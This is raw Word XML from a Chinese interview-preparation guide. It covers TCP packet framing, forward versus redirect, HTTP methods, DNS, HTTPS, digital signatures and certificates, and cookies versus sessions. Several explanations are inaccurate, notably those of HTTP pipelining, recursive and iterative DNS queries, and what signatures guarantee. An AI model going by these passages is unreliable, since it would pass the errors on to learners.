          <w:numId w:val="2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定长协议：在应用层协议中，固定每个数据包的大小，如每个数据包固定为1024字节。这种方法可以保证每个数据包大小一致，接收方按照固定长度接收数据，避免了拆包和粘包问题，但是如果实际传输的数据不足1024字节，会浪费网络带宽资源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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隔符协议：在应用层协议中，每个数据包之间使用特殊的分隔符进行分隔，如使用"\r\n"作为分隔符。接收方按照分隔符将不同的数据包分开，避免了拆包和粘包问题。但是分隔符本身可能会被误判为数据内容，需要进行特殊处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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固定长度头协议：在应用层协议中，每个数据包的头部固定长度，头部中包含了该数据包的长度信息。接收方先接收头部，从头部中读取数据包的长度信息，再根据数据包的长度接收数据，避免了拆包和粘包问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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将数据封装成消息：将每个数据包封装成一个完整的消息，消息中包含了数据包的长度、类型等信息。接收方接收完整的消息，再对消息进行解析，避免了拆包和粘包问题。该方法常用于应用层协议中。</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综合以上方法，可以根据实际场景选择合适的方法来解决拆包和粘包问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28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forward 和 redirect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Forward和Redirect是Web应用程序中经常用到的两个重要概念。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Forward是指在服务器端内部转发请求，把请求发送到另一个资源或页面进行处理，然后再将处理结果返回给客户端浏览器。Forward是在同一个Web服务器内部进行转发，转发后的请求对客户端浏览器是透明的，即客户端并不知道它访问的是不同的资源或页面。Forward的优点是速度快，因为转发是在同一个Web服务器内部完成的，不需要重新发起HTTP请求，而且转发后的处理结果也可以使用原来请求的对象，比如Request和Response等，方便数据共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edirect是指在服务器端返回一个特殊的HTTP响应，告诉客户端浏览器请求的资源已经被移动到一个新的位置，客户端浏览器需要重新发送新的HTTP请求到这个新的位置。Redirect是通过HTTP响应状态码实现的，一般是302或者301。客户端浏览器收到Redirect响应后，会重新发送一个新的HTTP请求到新的位置，并且将原来的请求的URL和参数一起发送到新的位置。Redirect的优点是可以解决URL重定向、资源移动等问题，同时也可以实现跳转到其他Web站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Forward是在同一个Web服务器内部进行转发，速度快，适合处理同一个Web应用程序的不同资源或页面；而Redirect是在客户端浏览器和Web服务器之间进行请求和响应，速度相对较慢，适合处理跨域或跨Web应用程序的请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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 方法有哪些？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HTTP（Hypertext Transfer Protocol，超文本传输协议）定义了客户端和服务器之间进行通信的方法，其中定义了多种方法（也称为HTTP动词），常用的包括：</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GET：从服务器获取资源，常用于获取页面、图片、音频、视频等静态资源。该方法不会改变服务器上的数据。</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POST：向服务器提交数据，常用于提交表单、上传文件等操作。该方法会改变服务器上的数据。</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PUT：向服务器上传资源，常用于上传文件等操作。该方法会覆盖服务器上的数据。</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DELETE：从服务器删除资源，常用于删除文件、删除数据库中的记录等操作。该方法会删除服务器上的数据。</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HEAD：类似于GET方法，但是只返回响应头部信息，不返回响应体信息。常用于检查资源是否存在、获取资源的元数据等操作。</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OPTIONS：查询服务器支持的HTTP方法，常用于测试和诊断。该方法返回服务器支持的HTTP方法列表以及其他相关信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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TRACE：回显服务器接收到的请求信息，常用于测试和诊断。该方法会返回服务器接收到的请求头和请求体信息。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除此之外，还有一些不常用的HTTP方法，例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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CONNECT：建立与服务器的隧道，用于代理服务器和HTTPS加密连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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PATCH：对服务器上的资源进行局部修改，常用于更新部分字段。该方法会修改服务器上的数据。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以上是常用的HTTP方法，每种方法都有不同的语义和使用场景。在实际应用中，根据具体的业务需求选择合适的HTTP方法是非常重要的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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在浏览器中输入 URL 地址到显示主页的过程？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在浏览器中输入URL地址到显示主页的过程可以大致分为以下几个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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DNS解析：浏览器首先将URL解析成主机名和端口号，并通过DNS服务器将主机名解析成IP地址。如果DNS缓存中没有相应的IP地址，则会向上级DNS服务器逐级查询，直到找到相应的IP地址或者查询失败。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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建立TCP连接：浏览器通过TCP协议与Web服务器建立连接。在建立连接的过程中，浏览器和服务器之间进行三次握手，以确保连接的可靠性和完整性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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发送HTTP请求：浏览器向Web服务器发送HTTP请求，请求消息中包含请求行、请求头和请求体等信息。其中请求行中包含请求方法、URL地址和协议版本等信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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服务器处理请求：Web服务器接收到浏览器发送的HTTP请求后，根据请求方法和URL地址等信息，选择相应的处理程序对请求进行处理，并生成响应消息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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接收响应：浏览器接收到Web服务器返回的响应消息，响应消息中包含响应行、响应头和响应体等信息。其中响应行中包含响应状态码和协议版本等信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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显示页面：浏览器解析响应消息中的HTML代码，并根据CSS、JavaScript等资源对页面进行布局和渲染，最终将页面呈现给用户。</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以上是在浏览器中输入URL地址到显示主页的基本过程，其中涉及到了多种网络协议和技术，如DNS、TCP、HTTP、HTML、CSS和JavaScript等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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DNS 的解析过程？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DNS（Domain Name System，域名系统）解析是将域名转换为IP地址的过程。下面是DNS解析的基本流程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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浏览器缓存：当用户首次访问某个网站时，浏览器会将域名和IP地址的映射关系缓存到本地，下次访问时可以直接从缓存中获取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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本地DNS服务器缓存：如果浏览器缓存中没有相应的映射关系，会将请求发送给本地DNS服务器，本地DNS服务器会将响应缓存到本地，下次同样的请求可以直接从缓存中获取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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根域名服务器查询：如果本地DNS服务器缓存中没有相应的映射关系，会向根域名服务器发送请求，根域名服务器返回所查询域名的顶级域名服务器的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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顶级域名服务器查询：本地DNS服务器向顶级域名服务器发送请求，顶级域名服务器返回下一级域名服务器的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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权限域名服务器查询：本地DNS服务器向下一级域名服务器发送请求，直到查询到相应域名的IP地址，然后将结果返回给浏览器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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访问网站：浏览器通过获取到的IP地址连接到对应的服务器，然后获取相应的网页内容。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DNS解析过程中存在递归查询和迭代查询两种方式，具体采用哪种方式取决于本地DNS服务器的配置。递归查询是本地DNS服务器逐级向上级DNS服务器查询，直到查询到结果；而迭代查询是本地DNS服务器向下一级DNS服务器查询，然后再将结果返回给上一级DNS服务器，直到查询到结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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谈谈你对域名缓存的了解？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域名缓存是指在DNS解析过程中，将查询过的域名和IP地址的映射关系缓存到本地，以便下次访问同样的域名时可以直接从缓存中获取IP地址，从而加快域名解析的速度和减轻DNS服务器的负载。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域名缓存主要分为三种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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浏览器缓存：当用户首次访问某个网站时，浏览器会将域名和IP地址的映射关系缓存到本地，下次访问时可以直接从缓存中获取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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系统缓存：系统缓存是指操作系统缓存的域名解析结果，通常由操作系统的DNS解析模块实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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DNS服务器缓存：DNS服务器缓存是指DNS服务器在解析域名时，将查询过的域名和IP地址的映射关系缓存到本地，下次同样的请求可以直接从缓存中获取，从而减轻DNS服务器的负载。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缓存时间是由DNS服务器返回给客户端的TTL（Time to Live）字段决定的。如果TTL设置得较短，那么缓存的有效时间就会较短，否则缓存的有效时间就会较长。在实际应用中，缓存时间需要根据具体情况进行设置，一般来说，缓存时间不宜过长，以避免缓存中的IP地址过期而导致访问出现问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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谈下你对 HTTP 长连接和短连接的理解？分别应用于哪些场景？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HTTP长连接和短连接是指客户端和服务器之间的TCP连接是否在一次HTTP请求和响应完成后关闭或保持打开状态。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短连接（也称为非持久连接）：即客户端和服务器之间每一次HTTP请求和响应都会新建立一个TCP连接，请求完成后立即关闭该连接。这种方式可以减轻服务器的负担，但是频繁的建立和关闭TCP连接也会占用更多的系统资源，增加网络传输的延迟，因此适用于请求量较小的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长连接（也称为持久连接）：即客户端和服务器之间的TCP连接在一次HTTP请求和响应完成后不会关闭，而是保持打开状态，以便后续的HTTP请求可以复用该连接，减少建立和关闭连接的次数，从而提高网络传输的效率。这种方式适用于请求量较大的场景，比如Web应用程序、电子商务等需要频繁交互的场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了HTTP长连接和短连接之外，还有一种称为HTTP管道的技术。HTTP管道是指客户端发送多个HTTP请求到服务器端，服务器端在处理完第一个请求之后不会立即响应，而是将后续的请求先缓存起来，然后一次性发送给客户端。HTTP管道可以有效地减少建立和关闭TCP连接的次数，从而提高网络传输的效率，但是需要注意的是，HTTP管道需要服务器端和客户端都支持，否则可能会引发协议不兼容的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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HTTPS 的工作过程？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HTTPS是一种安全的HTTP协议，它的工作过程可以分为以下几个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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客户端向服务器发起HTTPS请求，请求连接安全通道。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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服务器向客户端发送证书，包含公钥和服务器信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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客户端验证证书的合法性，如果证书不合法或过期，将中断连接，否则生成一份随机数作为对称密钥，并使用服务器的公钥进行加密，将加密后的对称密钥发送给服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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服务器使用自己的私钥对加密的对称密钥进行解密，得到客户端生成的对称密钥。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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客户端和服务器使用对称密钥进行数据传输，实现加密通信。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这个过程中，HTTPS使用了SSL/TLS协议来保证通信的安全性。其中，证书的颁发者为受信任的第三方机构，客户端可以通过本地存储的证书颁发机构信息来验证证书的合法性。另外，通过使用对称密钥来加密数据，HTTPS在一定程度上可以避免数据在传输过程中被窃取或篡改的风险。</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总的来说，HTTPS的工作过程相对于HTTP来说多了一步对称密钥的交换过程，这个过程保证了客户端和服务器之间的通信可以进行加密，从而保证了数据传输的安全性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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 和 HTTPS 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HTTP和HTTPS是两种常用的互联网协议，它们的主要区别在于安全性和数据传输方式。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HTTP（Hypertext Transfer Protocol，超文本传输协议）是一种基于文本的协议，用于在Web浏览器和Web服务器之间传输数据。HTTP传输的数据都是明文的，容易被黑客窃取和篡改，因此在安全性方面存在一定的风险。</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HTTPS（Hypertext Transfer Protocol Secure，安全的超文本传输协议）是HTTP的安全版本，通过使用SSL/TLS协议对HTTP传输的数据进行加密和身份验证，确保数据的机密性、完整性和可信度。HTTPS协议使用的是加密的SSL/TLS协议，可以保证传输过程中的数据不被黑客窃取、篡改或者伪造。</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HTTPS相比HTTP的优点在于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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安全性更高：HTTPS使用SSL/TLS协议对数据进行加密和身份验证，保证数据的机密性、完整性和可信度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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数据传输更加可靠：HTTPS使用TCP和TLS协议来传输数据，可以保证数据的可靠性和稳定性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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更好的SEO排名：Google搜索引擎已经将HTTPS作为搜索结果排序算法的一个重要指标，使用HTTPS可以提高网站的SEO排名。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不过，HTTPS协议相比HTTP协议来说会增加一定的网络负担和性能开销，因此在性能要求较高的场景下可能需要进行一些额外的优化和配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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HTTPS 的优缺点？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HTTPS是HTTP协议的安全版，使用SSL/TLS加密通信协议，可以有效地保障网络通信的安全性。以下是HTTPS的优缺点：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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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数据传输的安全性更高：HTTPS使用SSL/TLS加密协议，对传输的数据进行加密，从而防止被中间人拦截、篡改和窃取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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身份验证更可靠：HTTPS使用数字证书对网站的身份进行认证，从而保证用户连接到的是真实的网站，避免受到钓鱼网站的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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提高网站的信誉度：HTTPS是现代网站的标配，采用HTTPS可以提高网站的信誉度和用户的信任度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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SEO优化：谷歌已将HTTPS作为搜索排名算法的一个重要因素，采用HTTPS有助于提高网站的SEO优化效果。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缺点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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加密通信会增加服务器端的负载：HTTPS在加密通信时需要消耗更多的服务器资源，因此对于性能要求较高的网站，可能需要增加服务器的配置来满足性能需求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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建立连接时增加了额外的延迟：由于HTTPS需要进行加密和身份认证等操作，因此会增加与服务器建立连接的时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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部署和管理成本较高：HTTPS需要购买数字证书和安装配置SSL/TLS等相关设备，因此部署和管理成本较高。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HTTPS相比HTTP，虽然增加了一定的负载和成本，但是可以提高网络通信的安全性和可靠性，减少黑客攻击和窃取行为，保障用户的隐私安全，因此已成为现代网站的标配，逐渐成为了未来网络通信的主流方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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什么是数字签名？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字签名是一种用于验证数据完整性和身份认证的技术。它通过在数据上应用一种数学算法，生成一个特定的代码（即数字签名），该代码只能由数据的私有所有者（即签名者）生成。数字签名包括两个主要组成部分：签名生成和验证过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签名生成过程中，签名者使用一种私有密钥对数据进行加密，并生成数字签名。私有密钥只有签名者知道，因此，数字签名确保了数据的来源和完整性，防止数据被篡改或冒充。同时，签名者可以将公共密钥与数据一起发送给接收方，接收方使用相应的公共密钥来解密数字签名并验证数据的完整性和来源。如果验证成功，则说明数据没有被篡改或冒充。</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字签名技术广泛应用于网络安全领域，例如在电子邮件、电子商务和网络交易等方面。数字签名技术可以确保数据在传输过程中的完整性、保密性和不可否认性，从而提高数据的安全性，防止数据被窃取或篡改，保护用户的隐私和安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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什么是数字证书？</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数字证书是一种用于验证网络身份的安全文件，它通常由认证机构（CA）颁发。数字证书包含了一些关键信息，包括证书的持有者名称、证书的有效期、证书颁发机构、证书的公钥以及数字签名等信息。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字证书的工作原理是：使用非对称加密算法生成一对密钥，其中一个是私有密钥，只有证书持有者知道，另一个是公共密钥，可以公开发布。当证书持有者向认证机构申请数字证书时，认证机构会验证证书持有者的身份，并将证书的公共密钥与证书持有者的身份信息一起打包，并用认证机构的私有密钥对其进行数字签名。这样，当其他用户通过数字证书验证持有者身份时，可以使用认证机构的公共密钥来解密数字签名，以确认证书的真实性和有效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数字证书广泛应用于互联网中，例如网站加密通信、电子邮件安全、电子商务等领域。数字证书可以确保通信过程中的安全和隐私，防止数据被黑客窃取和篡改，提高网络通信的安全性和可靠性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30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Cookie 和 Session 有什么区别？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Cookie和Session都是用于在客户端和服务器之间跟踪状态的技术，但它们的工作方式和应用场景略有不同。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ookie是一种存储在客户端浏览器中的小型文本文件，它包含了与特定站点相关的信息，例如登录凭据、用户偏好设置等。在客户端发送请求时，浏览器会将相应的Cookie发送给服务器进行验证。服务器可以使用Cookie中的信息来标识和跟踪客户端的状态。Cookie可以设置过期时间，这样浏览器就可以在一段时间内保留Cookie信息，无需重复登录。</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Session则是一种服务器端的状态管理机制，它通过在服务器上创建一个会话来跟踪客户端的状态。服务器在客户端请求时为其创建一个唯一的Session ID，并将其存储在客户端的Cookie中。客户端每次发送请求时，都会将Session ID发送给服务器进行验证。服务器可以使用Session ID来标识和跟踪客户端的状态，包括登录凭据、购物车等信息。与Cookie不同，Session信息保存在服务器端，客户端无法修改。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ookie和Session各有优缺点。Cookie适用于需要在多个页面之间共享数据的情况，例如登录凭据和用户偏好设置等。Session适用于需要在服务器端跟踪客户端状态的情况，例如购物车和会话管理等。同时，Cookie可能会受到安全问题的困扰，例如跨站点脚本攻击和数据泄露等。为了提高安全性，Session应该在传输过程中使用加密和身份验证技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Cookie和Session有以下不同点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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存储位置：Cookie存储在客户端浏览器中，而Session存储在服务器端的内存或文件系统中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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数据安全性：由于Cookie存储在客户端，因此可能会被窃取或篡改。而Session存储在服务器端，相对更加安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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数据量限制：Cookie通常不能超过4KB，因此适合存储少量数据。而Session没有数据量限制，因此适合存储大量数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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有效期：Cookie可以设置过期时间，因此可以长期保存。而Session通常在用户关闭浏览器或一段时间不活动后失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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应用场景：Cookie适用于需要在多个页面之间共享数据的情况，例如登录凭据和用户偏好设置等。而Session适用于需要在服务器端跟踪客户端状态的情况，例如购物车和会话管理等。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需要注意的是，Cookie和Session并不是相互排斥的，它们可以结合使用来实现更加完善的用户状态管理。例如，在客户端的Cookie中存储Session ID，以便服务器可以识别和跟踪客户端状态。</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十、操作系统 32 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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简单说下你对并发和并行的理解？</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并发和并行是计算机领域中两个重要的概念，它们的主要区别在于任务的执行方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="DDDDDD" w:sz="2" w:space="21"/>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并发是指多个任务交替地执行，它们共享同一个CPU时间片，但是在时间上看起来是同时执行的。并发的目的是为了提高CPU的利用率，使得多个任务可以同时进行，从而提高系统的响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应速度和吞吐量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
          <w:top w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:left w:val="single" w:color="DDDDDD" w:sz="2" w:space="21"/>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而并行是指多个任务真正同时执行，它们可以分配到不同的CPU核心上执行，每个核心都可以独立处理任务，从而提高整个系统的处理能力。并行通常用于大规模数据处理、科学计算等需要高性能计算的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:pBdr>
